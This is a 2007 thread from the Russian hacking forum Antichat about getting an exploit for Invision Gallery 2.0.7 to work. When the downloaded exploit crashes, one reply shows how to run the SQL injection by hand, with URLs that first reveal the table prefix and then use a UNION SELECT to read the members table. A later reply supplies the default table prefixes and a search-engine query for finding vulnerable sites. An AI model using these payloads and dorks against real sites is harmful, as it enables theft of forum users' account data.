ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Проблема с сплойтом на Invision Gallery 2.0.7
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Проблема с сплойтом на Invision Gallery 2.0.7
  #1  
Старый 21.05.2007, 00:54
Аватар для Gatl
Gatl
Новичок
Регистрация: 28.04.2007
Сообщений: 4
Провел на форуме:
63831

Репутация: 0
По умолчанию Проблема с сплойтом на Invision Gallery 2.0.7
скачал сплойт "Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit" от HellKnights. Откомпилил при попытке заюзать выдает ошибку аля
"Exception 0xc0000005:
Segment violation
Adress: 0x73d5e67d"
и в cmd пишет "abnormal program termination"
В коде сплойта создателями специально допущена ошибка? Вот в общем то помогите решить проблему.
ссылка на сам сплойт
Последний раз редактировалось Gatl; 21.05.2007 в 01:04..
 

  #2  
Старый 23.05.2007, 12:56
Аватар для p-range
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
Если не можешь использовать эксплоит, учись разбирать его и делай все вручную.
Как видно из исходника, здесь присутствуют 2 уязвимости. sql-injection и readfile().
ReadFile() мы трогать не будем, тут и так все понятно.
Рассмотрим sql-injection.
Для начала узнаем префикс таблиц в бд:
Цитата:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew
Теперь используем багу так:
Цитата:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1+union+select+1,1,1,1,1,1,1,1,1+from+prefix_members+where+id=id
вместо prefix и id подставляем соответствующие значения.
Как видишь, ничего сложного \=
 

  #3  
Старый 24.05.2007, 05:42
Аватар для MATPOCKuH_82
MATPOCKuH_82
Новичок
Регистрация: 22.05.2007
Сообщений: 6
Провел на форуме:
11947

Репутация: 0
По умолчанию
Можно два глупых вопроса ? ))

вместо prefix и id подставляем соответствующие значения.

что такое Префикс ???

и как в поисковиках писать что бы найти "Invision Gallery => 2.0.7" ???
 

  #4  
Старый 24.05.2007, 07:48
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
префикс по дэфолту обычно или ipb_ или ibf_

http://www.google.com/search?hl=en&q=Invision+Gallery+2.0.7+%C2%A9+2007+ +IPS%2C+Inc.&btnG=Search

клозед. вопрос исчерпан.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема со сплойтом для вхзлома ipb 2.0.0 Taylorith Форумы 8 18.02.2007 20:06
invision gallery anakreon Форумы 8 19.01.2007 00:06
Invision Gallery 2.0.7 ReadFile() & SQL injection exploit ~!DoK_tOR!~ Форумы 1 04.01.2007 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ